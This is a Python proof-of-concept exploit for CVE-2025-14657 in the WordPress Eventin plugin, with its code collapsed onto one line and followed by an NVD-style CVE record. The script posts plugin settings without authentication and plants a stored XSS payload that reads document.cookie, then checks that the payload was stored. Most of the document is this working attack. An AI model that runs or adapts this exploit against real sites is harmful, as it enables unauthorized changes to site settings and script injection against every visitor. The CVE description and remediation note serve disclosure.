CVE-2025-14657

import requests import json # WordPress Eventin Plugin CVE-2025-14657 PoC # Unauthenticated Settings Modification + Stored XSS target_url = "http://target-wordpress-site.com" # Endpoint for modifying plugin settings without authentication api_endpoint = f"{target_url}/wp-json/eventin/v1/settings" # Malicious payload - Stored XSS via etn_primary_color setting malicious_payload = { "etn_primary_color": "red;background-image:url(javascript:alert(document.cookie))", "etn_secondary_color": "#fff" } print("[*] CVE-2025-14657 PoC - Eventin Plugin Unauthorized Settings Modification") print(f"[*] Target: {target_url}") # Step 1: Modify plugin settings without authentication print("\n[Step 1] Sending malicious settings to modify plugin configuration...") try: response = requests.post( api_endpoint, json=malicious_payload, headers={ "Content-Type": "application/json", "X-WordPress-Nonce": "" # No nonce required - missing capability check }, timeout=10 ) if response.status_code in [200, 201]: print("[+] Settings modified successfully!") print(f"[+] Response: {response.text}") print("[+] Stored XSS payload injected via etn_primary_color") else: print(f"[-] Request failed with status: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") # Step 2: Verify the XSS payload is stored verify_endpoint = f"{target_url}/wp-json/eventin/v1/settings" print("\n[Step 2] Verifying stored XSS payload...") try: verify_response = requests.get(verify_endpoint, timeout=10) if "javascript:alert" in verify_response.text: print("[+] XSS payload confirmed stored in database!") except: print("[-] Could not verify payload storage") print("\n[*] Impact: All users visiting pages with Eventin styles will execute the malicious JS") print("[*] Remediation: Upgrade to Eventin version 4.0.52 or higher")

{"cve": {"id": "CVE-2025-14657", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.487", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Eventin – Event Manager, Events Calendar, Event Tickets and Registrations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'post_settings' function in all versions up to, and including, 4.0.51. This makes it possible for unauthenticated attackers to modify plugin settings. Furthermore, due to insufficient input sanitization and output escaping on the 'etn_primary_color' setting, this enables unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a page where Eventin styles are loaded."}, {"lang": "es", "value": "El plugin Eventin – Event Manager, Events Calendar, Event Tickets and Registrations para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de comprobación de capacidad en la función 'post_settings' en todas las versiones hasta la 4.0.51, inclusive. Esto hace posible que atacantes no autenticados modifiquen la configuración del plugin. Además, debido a una sanitización de entrada y un escape de salida insuficientes en la configuración 'etn_primary_color', esto permite a atacantes no autenticados inyectar scripts web arbitrarios que se ejecutarán cada vez que un usuario acceda a una página donde se carguen los estilos de Eventin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/Enqueue/register.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2FEnqueue%2Fregister.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/api-handler.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2Fapi-handler.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/core/event/api.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fcore%2Fevent%2Fapi.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4188b26-80f8-41b8-be19-1ddcbd7e39f5?source=cve", "source": "[email protected]"}]}}